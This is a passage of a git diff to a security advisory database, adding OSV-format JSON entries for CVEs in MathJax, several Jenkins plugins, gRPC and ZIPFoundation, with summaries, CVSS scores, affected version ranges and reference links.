@@ "introduced": "0" }, { - "last_affected": "0.9.16" + "fixed": "0.9.18" } ] } - ] + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.17" + } } ], "references": [ @@ -52,6 +55,10 @@ "type": "PACKAGE", "url": "https://github.com/weichsel/ZIPFoundation" }, + { + "type": "WEB", + "url": "https://github.com/weichsel/ZIPFoundation/releases/tag/0.9.18" + }, { "type": "WEB", "url": "https://ostorlab.co/vulndb/advisory/OVE-2023-4" diff --git a/advisories/github-reviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json b/advisories/github-reviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json new file mode 100644 index 0000000000000..0b24dc8e38da3 --- /dev/null +++ b/advisories/github-reviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v638-q856-grg8", + "modified": "2024-01-31T00:02:46Z", + "published": "2023-08-29T21:30:21Z", + "aliases": [ + "CVE-2023-39663" + ], + "summary": "MathJax Regular expression Denial of Service (ReDoS)", + "details": "Mathjax up to v2.7.9 was discovered to contain two Regular expression Denial of Service (ReDoS) vulnerabilities in MathJax.js via the components pattern and markdownPattern. NOTE: the vendor disputes this because the regular expressions are not applied to user input; thus, there is no risk.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "mathjax" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.7.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39663" + }, + { + "type": "WEB", + "url": "https://github.com/mathjax/MathJax/issues/3074" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:02:46Z", + "nvd_published_at": "2023-08-29T20:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json b/advisories/github-reviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json new file mode 100644 index 0000000000000..79bb8a5f9f9d8 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vcr-579j-4x48", + "modified": "2024-01-30T23:11:51Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41940" + ], + "summary": "Stored XSS vulnerability in Jenkins TAP Plugin", + "details": "Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.tap4j:tap" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41940" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3190" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:11:51Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json b/advisories/github-reviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json new file mode 100644 index 0000000000000..e0602c18b7060 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gh2-m88h-8cj8", + "modified": "2024-01-30T23:07:24Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41939" + ], + "summary": "Disabled permissions can be granted by Jenkins SSH2 Easy Plugin", + "details": "Jenkins SSH2 Easy Plugin 1.4 and earlier does not verify that permissions configured to be granted are enabled, potentially allowing users formerly granted (typically optional permissions, like Overall/Manage) to access functionality they're no longer entitled to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ssh2easy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41939" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3064" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:07:24Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json b/advisories/github-reviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json new file mode 100644 index 0000000000000..c3cff2725c5cf --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jxp-f5rr-g6jc", + "modified": "2024-01-30T23:04:47Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41931" + ], + "summary": "XSS vulnerability in Jenkins Job Configuration History Plugin", + "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not property sanitize or escape the timestamp value from history entries when rendering a history entry on the history view, resulting in a stored cross-site scripting (XSS) vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jobConfigHistory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1229.v3039470161a_d" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1227.v7a" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41931" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:04:47Z", + "nvd_published_at": "2023-09-06T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json b/advisories/github-reviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json new file mode 100644 index 0000000000000..175f8b223dc63 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63vw-rprv-4f8j", + "modified": "2024-01-30T23:05:03Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41938" + ], + "summary": "CSRF vulnerability in Jenkins Ivy Plugin", + "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Ivy Plugin 2.5 and earlier allows attackers to delete disabled modules.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ivy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41938" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3093" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:05:03Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json b/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json index 2392c2f3be08f..e52f05457d323 100644 --- a/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json +++ b/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2-dev/CVE-2015-5467.yaml" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2015-5467.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/yiisoft/yii2-framework" @@ -51,6 +55,10 @@ { "type": "WEB", "url": "https://www.yiiframework.com/news/87/yii-2-0-5-is-released-security-fix" + }, + { + "type": "WEB", + "url": "https://www.yiiframework.com/news/87/yii-2-0-5-is-released-security-fix/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json b/advisories/github-reviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json new file mode 100644 index 0000000000000..f37349ab3cd3a --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-997j-37h7-mhg9", + "modified": "2024-01-30T23:19:53Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41942" + ], + "summary": "CSRF vulnerability in Jenkins AWS CodeCommit Trigger Plugin", + "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers to clear the SQS queue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41942" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:53Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json b/advisories/github-reviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json new file mode 100644 index 0000000000000..5835ab7d9ecc5 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9v8g-f9mq-739g", + "modified": "2024-01-30T23:11:07Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41934" + ], + "summary": "Improper masking of credentials in Jenkins Pipeline Maven Integration Plugin", + "details": "Jenkins Pipeline Maven Integration Plugin 1330.v18e473854496 and earlier does not properly mask (i.e., replace with asterisks) usernames of credentials specified in custom Maven settings in Pipeline build logs if \"Treat username as secret\" is checked.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:pipeline-maven" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1331.v003efa_fd6e81" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1330.v18e473854496" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41934" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3257" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:11:07Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json b/advisories/github-reviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json new file mode 100644 index 0000000000000..0f8b190203c84 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7r5-cww9-64q6", + "modified": "2024-01-30T23:12:08Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41930" + ], + "summary": "Path traversal in Jenkins Job Configuration History Plugin", + "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict the 'name' query parameter when rendering a history entry, allowing attackers to have Jenkins render a manipulated configuration history that was not created by the plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jobConfigHistory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1229.v3039470161a_d" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1227.v7a" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41930" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:12:08Z", + "nvd_published_at": "2023-09-06T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json b/advisories/github-reviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json new file mode 100644 index 0000000000000..09985e6a1b616 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgh7-rgqg-hrcx", + "modified": "2024-01-30T23:11:19Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41932" + ], + "summary": "Path traversal allows exploiting XXE vulnerability in Jenkins Job Configuration History Plugin", + "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict 'timestamp' query parameters in multiple endpoints, allowing attackers with to delete attacker-specified directories on the Jenkins controller file system as long as they contain a file called 'history.xml'.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jobConfigHistory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1229.v3039470161a_d" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1227.v7a" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41932" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3235" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:11:19Z", + "nvd_published_at": "2023-09-06T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json b/advisories/github-reviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json new file mode 100644 index 0000000000000..ad6fdda190ad0 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4qf-5523-7wvf", + "modified": "2024-01-30T23:02:07Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41944" + ], + "summary": "HTML injection vulnerability in Jenkins AWS CodeCommit Trigger Plugin", + "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not escape the queue name parameter passed to a form validation URL, when rendering an error message, resulting in an HTML injection vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41944" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3102" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:02:07Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json b/advisories/github-reviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json new file mode 100644 index 0000000000000..c682d29f31e44 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6rx-2w84-xmgj", + "modified": "2024-01-30T23:00:57Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41946" + ], + "summary": "CSRF vulnerability in Jenkins Frugal Testing Plugin", + "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers to connect to Frugal Testing using attacker-specified credentials, and to retrieve test IDs and names from Frugal Testing, if a valid credential corresponds to the attacker-specified username.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:frugal-testing" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41946" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:00:57Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json b/advisories/github-reviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json new file mode 100644 index 0000000000000..e1f2d87b4db17 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json @@ -0,0 +1,83 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hj7p-h74j-6gxj", + "modified": "2024-01-30T23:10:45Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41935" + ], + "summary": "Non-constant time nonce comparison in Jenkins Microsoft Entra ID (previously Azure AD) Plugin", + "details": "Jenkins Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b_1154b_3fb_, uses a non-constant time comparison function when checking whether the provided and expected CSRF protection nonce are equal, potentially allowing attackers to use statistical methods to obtain a valid nonce.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:azure-ad" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "378.380.v545b" + }, + { + "fixed": "397.v907382dd9b" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 396.v86ce29279947" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:azure-ad" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "378.vd6e2874a" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41935" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3227" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-697" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:10:45Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json b/advisories/github-reviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json new file mode 100644 index 0000000000000..3506e96e652b7 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json @@ -0,0 +1,207 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p25m-jpj4-qcrr", + "modified": "2024-02-02T20:42:27Z", + "published": "2023-09-13T18:31:26Z", + "aliases": [ + "CVE-2023-4785" + ], + "summary": "Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)", + "details": "Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.56.0" + }, + { + "fixed": "1.56.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.55.0" + }, + { + "fixed": "1.55.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.54.0" + }, + { + "fixed": "1.54.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "grpc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.53.0" + }, + { + "fixed": "1.53.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "grpcio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.55.0" + }, + { + "fixed": "1.55.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "grpcio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.54.0" + }, + { + "fixed": "1.54.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "grpcio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.53.0" + }, + { + "fixed": "1.53.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4785" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33656" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33667" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33669" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33670" + }, + { + "type": "WEB", + "url": "https://github.com/grpc/grpc/pull/33672" + }, + { + "type": "WEB", + "url": "https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.53.2" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.54.3" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.55.3" + }, + { + "type": "WEB", + "url": "https://rubygems.org/gems/grpc/versions/1.56.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-248" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:42:27Z", + "nvd_published_at": "2023-09-13T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json b/advisories/github-reviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json new file mode 100644 index 0000000000000..a3bb4c68aae81 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p986-hpr3-493p", + "modified": "2024-01-30T23:01:54Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41947" + ], + "summary": "Missing permission checks in Jenkins Frugal Testing Plugin", + "details": "A missing permission check in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers with Overall/Read permission to connect to Frugal Testing using attacker-specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:frugal-testing" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": 